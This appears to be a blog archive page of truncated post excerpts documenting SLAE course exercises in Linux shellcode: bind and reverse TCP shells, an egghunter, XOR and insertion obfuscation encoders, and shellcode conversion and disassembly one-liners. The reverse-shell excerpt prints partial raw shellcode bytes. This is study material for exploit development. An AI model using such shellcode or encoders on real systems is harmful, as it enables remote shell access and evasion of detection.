Linux Shell Bind TCP Shellcode
As part of the SecurityTube SLAE course, I’m going to create a series of shellcodes and document the process. The first task is to create a simple shell bind tcp that spawns a shell on connect, with a...

Linux Reverse Shell TCP Shellcode
Now to create a reasonably well optimized Linux Reverse TCP shellcode (66 bytes): "\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" "\x7f\x00\x00\x01" <- IP address...

Linux Egghunter Shellcode
I created my first egghunter today, and with a little optimization it’s only 38 bytes in size. It would be possible to make a smaller egghunter that did not check for access to the page such as this...

Linux Insertion Obfuscated Shellcode
Here is my next shellcode, along with a generator. This generator inserts a random bit between each legitimate shellcode character, and then the decoder stub unpacks it before running it: ; Title Linux...

Insertion and additive XOR encoder shellcode
Another shellcode generator I’ve just created is an additive XOR encoder on top of the previous insertion encoder. Each byte in the shellcode is XOR’d with the previous. Bad character filtering is also...

Converting binary to shellcode
Here is my ‘bin2sc.sh’. This is a short bash script that will convert binary to shellcode on the Linux console using objdump: #!/bin/bash code=$(objdump -d $1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2...

SLAE Shellcode Dissection
As part of the SecurityTube SLAE course, I’m going to dissect 3 shellcodes from shell-storm.org and then also create variants of 3 shellcodes from shell-storm.org. Here they are:...

Python Cascading XOR Polymorphic Shellcode Generator
I’ve been working on a simple Python utility to encode and wrap existing shellcode. The shellcode is XOR’d with a random seed byte each time, and then the shellcode is XOR’d with the previous byte. The...

BASH One liner – Disassemble shellcode
Here’s a BASH one liner that I just discovered that will allow you to disassemble shellcode on the command line: echo -n $'\x41\x41\x41\x41' | ndisasm -u - 00000000 41 inc ecx 00000001 41 inc ecx...